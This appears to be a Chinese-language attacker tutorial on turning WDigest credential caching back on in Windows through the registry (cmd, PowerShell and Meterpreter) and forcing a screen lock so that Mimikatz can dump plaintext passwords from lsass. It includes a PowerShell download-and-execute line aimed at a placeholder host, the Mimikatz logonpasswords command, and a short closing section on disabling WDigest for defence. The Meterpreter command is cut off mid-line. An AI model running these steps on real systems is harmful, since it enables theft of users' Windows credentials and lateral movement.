windows可以看作是一个SSO,WDigest.dll从Windows XP引入,目的是为了把明文密码存在lsass里进行重复认证,从而减少用户输入密码的次数。并且无论是否使用它,都会将其存储在内存中。
老版本的系统打了补丁KB2871997,可以修改注册表禁用WDigest协议。
原理
在Windows Server2012及其以后的版本中,系统默认禁用Wdigest Auth,lsass进程不再保存明文口令。Mimikatz也就读不到密码明文,这是微软为了防止内存中泄露明文密码做的一个安全措施。
但由于一些系统服务需要用到 Wdigest Auth,所以该选项是可以手动开启的(开启后,需要用户重新登录/锁屏重新输入密码生效)。
修改注册表,然后使用cmd锁屏/重启让用户重新登陆使mimikatz可以读取明文密码。
开启wdigest Auth读取明文密码
cmd:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
powershell:
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
meterpreter:
reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogon强制锁屏让用户输入密码/重启
cmd:
rundll32 user32.dll,LockWorkStation
Powershell:
Function Lock-WorkStation
{
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
powershell -c “IEX (New-Object Net.WebClient).DownloadString(‘https://x.x.x.x/Lock-WorkStation.ps1’);”读取内存明文
mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exit
type mimikatz.log | find /I “password”
WDigest 禁用缓存
WDigest默认在 win2008 之前启用,但是在 win2008 之后的系统上,默认是关闭的。如果在 win2008 之前的系统上打了 KB2871997 补丁,那么就可以去启用或者禁用 WDigest。
启用或者禁用WDigest修改注册表位置:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
UseLogonCredential 值设置为 0, WDigest不把凭证缓存在内存,mimiktaz抓不到明文;UseLogonCredential 值设置为 1, WDigest把凭证缓存在内存,mimiktaz可以获取到明文。
在注册表中将UseLogonCredential 值设置为 0,或者使用命令
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
History
- Created 2022-10-22 11:38
- Published 2021-06-17 11:43
- Updated 2022-10-22 16:05
